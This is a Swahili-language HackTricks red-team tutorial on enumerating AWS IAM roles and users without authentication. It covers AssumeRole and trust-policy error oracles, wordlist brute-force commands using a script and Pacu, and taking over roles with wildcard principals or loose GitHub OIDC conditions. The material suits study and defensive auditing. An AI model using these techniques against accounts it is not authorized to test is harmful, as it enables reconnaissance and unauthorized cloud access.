AWS - IAM & STS Unauthenticated Enum

Reading time: 6 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Kuorodhesha Majukumu & Majina ya Watumiaji katika akaunti

Kujifanya Kuwa na Majukumu kwa Nguvu

caution

Teknolojia hii haifanyi kazi tena kwani ikiwa jukumu lipo au la, kila wakati unapata kosa hili:

An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::947247140022:user/testenv is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::429217632764:role/account-balanceasdas

Unaweza kujaribu hii ukikimbia:

aws sts assume-role --role-arn arn:aws:iam::412345678909:role/superadmin --role-session-name s3-access-example

Kujaribu kujifanya kuwa na jukumu bila ruhusa zinazohitajika kunasababisha ujumbe wa kosa kutoka AWS. Kwa mfano, ikiwa hauna ruhusa, AWS inaweza kurudisha:

ruby
An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::012345678901:user/MyUser is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS

Ujumbe huu unathibitisha uwepo wa jukumu lakini unaonyesha kwamba sera yake ya kudhani jukumu haikuruhusu kudhani. Kinyume chake, kujaribu kudhani jukumu lisilokuwepo kunasababisha kosa tofauti:

less
An error occurred (AccessDenied) when calling the AssumeRole operation: Not authorized to perform sts:AssumeRole

Kwa kushangaza, njia hii ya kubaini kati ya majukumu yaliyopo na yasiyokuwepo inatumika hata kati ya akaunti tofauti za AWS. Kwa kutumia ID halali ya akaunti ya AWS na orodha ya maneno iliyolengwa, mtu anaweza kuorodhesha majukumu yaliyopo katika akaunti bila kukutana na vizuizi vyovyote vilivyomo.

Unaweza kutumia script hii kuorodhesha wakuu wanaowezekana kwa kutumia tatizo hili.

Sera za Kuamini: Brute-Force Majukumu na watumiaji wa Akaunti Mbalimbali

Kuweka au kuboresha sera ya kuamini ya jukumu la IAM kunahusisha kufafanua ni rasilimali au huduma zipi za AWS zinazoruhusiwa kuchukua jukumu hilo na kupata akreditif za muda. Ikiwa rasilimali iliyotajwa katika sera ipo, sera ya kuamini inahifadhi kwa mafanikio. Hata hivyo, ikiwa rasilimali haiwezi kupatikana, kosa linatokea, likionyesha kuwa mkuu asiye sahihi amewekwa.

warning

Kumbuka kwamba katika rasilimali hiyo unaweza kutaja jukumu au mtumiaji wa akaunti tofauti:

  • arn:aws:iam::acc_id:role/role_name
  • arn:aws:iam::acc_id:user/user_name

Hii ni mfano wa sera:

json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::216825089941:role/Test"
},
"Action": "sts:AssumeRole"
}
]
}

GUI

Hiyo ni makosa utakayokutana nayo ikiwa unatumia jukumu ambalo halipo. Ikiwa jukumu lipo, sera itakuwa imehifadhiwa bila makosa yoyote. (Makosa ni kwa ajili ya sasisho, lakini pia inafanya kazi wakati wa kuunda)

CLI

bash
### You could also use: aws iam update-assume-role-policy
# When it works
aws iam create-role --role-name Test-Role --assume-role-policy-document file://a.json
{
"Role": {
"Path": "/",
"RoleName": "Test-Role",
"RoleId": "AROA5ZDCUJS3DVEIYOB73",
"Arn": "arn:aws:iam::947247140022:role/Test-Role",
"CreateDate": "2022-05-03T20:50:04Z",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::316584767888:role/account-balance"
},
"Action": [
"sts:AssumeRole"
]
}
]
}
}
}

# When it doesn't work
aws iam create-role --role-name Test-Role2 --assume-role-policy-document file://a.json
An error occurred (MalformedPolicyDocument) when calling the CreateRole operation: Invalid principal in policy: "AWS":"arn:aws:iam::316584767888:role/account-balanceefd23f2"

Unaweza kuendesha mchakato huu kwa kutumia https://github.com/carlospolop/aws_tools

  • bash unauth_iam.sh -t user -i 316584767888 -r TestRole -w ./unauth_wordlist.txt

Tukitumia Pacu:

  • run iam__enum_users --role-name admin --account-id 229736458923 --word-list /tmp/names.txt
  • run iam__enum_roles --role-name admin --account-id 229736458923 --word-list /tmp/names.txt
  • Rol admin iliyotumika katika mfano ni role katika akaunti yako ambayo itachukuliwa na pacu ili kuunda sera zinazohitajika kwa ajili ya uainishaji

Privesc

Katika kesi ambapo role ilikuwa imewekwa vibaya na inaruhusu mtu yeyote kuichukua:

json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "sts:AssumeRole"
}
]
}

Mshambuliaji anaweza tu kudhani hivyo.

Ushirikiano wa OIDC wa Tatu

Fikiria kwamba umeweza kusoma Github Actions workflow inayofikia role ndani ya AWS.
Hii imani inaweza kutoa ufikiaji kwa role yenye trust policy ifuatayo:

json
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Federated": "arn:aws:iam::<acc_id>:oidc-provider/token.actions.githubusercontent.com"
},
"Action": "sts:AssumeRoleWithWebIdentity",
"Condition": {
"StringEquals": {
"token.actions.githubusercontent.com:aud": "sts.amazonaws.com"
}
}
}
]
}

Sera hii ya kuaminiana inaweza kuwa sahihi, lakini ukosefu wa masharti zaidi unapaswa kukufanya usiamini.
Hii ni kwa sababu jukumu la awali linaweza kuchukuliwa na MTU YEYOTE kutoka Github Actions! Unapaswa kubainisha katika masharti pia mambo mengine kama jina la shirika, jina la repo, env, brach...

Kukosea kwa uwekaji mwingine ni kuongeza sharti kama ifuatavyo:

json
"StringLike": {
"token.actions.githubusercontent.com:sub": "repo:org_name*:*"
}

Kumbuka kwamba wildcard (*) kabla ya colon (:). Unaweza kuunda shirika kama org_name1 na assume the role kutoka kwa Github Action.

References

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks